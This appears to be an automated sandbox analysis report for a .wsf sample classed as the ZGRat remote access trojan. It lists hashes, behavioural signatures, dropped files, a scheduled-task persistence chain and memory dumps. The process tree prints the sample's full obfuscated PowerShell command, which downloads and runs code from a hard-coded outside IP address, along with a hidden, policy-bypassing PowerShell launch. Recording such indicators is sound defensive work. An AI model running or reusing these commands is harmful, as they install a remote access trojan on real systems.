Analysis

  • max time kernel
    145s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64 arch:x86 image:win7-20231215-en locale:en-us os:windows7-x64 system
  • submitted
    23/01/2024, 12:29

General

  • Target

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf

  • Size

    144KB

  • MD5

    d98237f1eb423d002ec4431002532420

  • SHA1

    3c03b0e124cf15312a0cf43e1a74a3827b027e29

  • SHA256

    f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

  • SHA512

    9f5b13ed4f562508635ead16e1976b05c79be6f94a6d95a8dac2ec538954c33e232682b3b2c1c637c1a928e8cc00c0589da834e41cd558df51c45eba01596a4f

  • SSDEEP

    3072:LvvvvvvvvvvvkAAAAAAAAAAABvvvvvvvvvvvkAAAAAAAAAAAyvvvvvvvvvvvkAAn:QAAAAAAAAAAASAAAAAAAAAAAdAAAAAA3

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.81.157.103/96/1.txt

Signatures

  • Detect ZGRat V1 1 IoCs
  • ZGRat

    ZGRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (1).wsf"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:1692
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex('(&aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy(aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyGaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyM *aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy-aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyOaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy*aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy)NaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy.aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyWaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEybaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyCaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyeaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy).DaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEywaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEylaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyoaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyaaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEydaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEySaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEytaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyraUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyiaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEynaUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEyg(''http://185.81.157.103/96/1.txt'')').Replace('aUTSRQPONMLKJIHZYXWVGFEhUTSRQPONMLKJIHZYXWVGFEbUTSRQPONMLKJIHZYXWVGFEpUTSRQPONMLKJIHZYXWVGFEjUTSRQPONMLKJIHZYXWVGFEeUTSRQPONMLKJIHZYXWVGFEy','')|iex
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {B1F5D91D-0ECF-4114-BA10-3A0FC54202E9} S-1-5-21-928733405-3780110381-2966456290-1000:VTILVGXH\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1040
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\hich.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2540
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"
    1⤵
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:1316

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

          Filesize

          7KB

          MD5

          25af3af8f786943d78326df1a84fd5df

          SHA1

          331aa1b11635d06c4ab3e292139e134c3f907113

          SHA256

          6058dfc7bbbaac27a77299952669de5145c7a3277dcf3e46f8af4e4eac87f29a

          SHA512

          d32a51522562117700a735e1af0ae279528a3e668ee753cb1b45dfe9422a3bc184a9ba4c94c12dc78c73b8324d3b392f5e1e478cfec066333e4170f342f06f90

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\J8RF7N5OGWR5H3BR9IKQ.temp

          Filesize

          7KB

          MD5

          ce37b88de003d46be6fb52b722efd721

          SHA1

          9817eb666450d67d8d1a96ba8d99b760132bc856

          SHA256

          a9f696a8992cbb6984933405c456d49c2e97adc9e98a2f8ee6e88f6a7f5a5fd1

          SHA512

          f93ee23a0ab7b0574fba19eced9e7d835627c09d0ee0bfab7f4239c2f4b53ad374de3498c282776082b551c30e09b82c56aaca574eea8c23e44b33d86aa56ada

        • C:\Users\Public\hich.bat

          Filesize

          195B

          MD5

          6c8a34a94e068b809145df09acbe153c

          SHA1

          0ec5c6964c6ccc949af47297eb9794f8f1ee4724

          SHA256

          c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003

          SHA512

          41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

        • C:\Users\Public\hich.ps1

          Filesize

          556KB

          MD5

          b13a273e32d5763a07d712e5209055fa

          SHA1

          633dd0e5f647fee13536f74247159cdb07d72273

          SHA256

          2c9c01e49757fa9a9732a3e9a1f06fb785afe6f288382458d4e6bbf0adee3486

          SHA512

          8b50f49dfd641467b7c11363d221c790e99b41aa4fdd97befb8c7deb1516584774690ab2b9ee4be951d162d9a56d57586af1d49d39a6f6f97a8a3b1fbc432908

        • C:\Users\Public\hich.vbs

          Filesize

          686B

          MD5

          741b5b0a474f0e0cd28fd880f68723c0

          SHA1

          4de5489c4e56882514b3ab432048200eae65f90d

          SHA256

          f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23

          SHA512

          3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

        • memory/1316-33-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-26-0x000000001B200000-0x000000001B4E2000-memory.dmp

          Filesize

          2.9MB

        • memory/1316-37-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-36-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-35-0x000000001B600000-0x000000001B634000-memory.dmp

          Filesize

          208KB

        • memory/1316-31-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-32-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-30-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-28-0x000007FEF5DD0000-0x000007FEF676D000-memory.dmp

          Filesize

          9.6MB

        • memory/1316-29-0x0000000002450000-0x00000000024D0000-memory.dmp

          Filesize

          512KB

        • memory/1316-27-0x00000000025E0000-0x00000000025E8000-memory.dmp

          Filesize

          32KB

        • memory/2744-11-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-10-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-7-0x000000001B1C0000-0x000000001B4A2000-memory.dmp

          Filesize

          2.9MB

        • memory/2744-8-0x0000000002570000-0x0000000002578000-memory.dmp

          Filesize

          32KB

        • memory/2744-9-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-13-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-12-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB

        • memory/2744-18-0x000007FEF5D30000-0x000007FEF66CD000-memory.dmp

          Filesize

          9.6MB

        • memory/2744-14-0x0000000002960000-0x00000000029E0000-memory.dmp

          Filesize

          512KB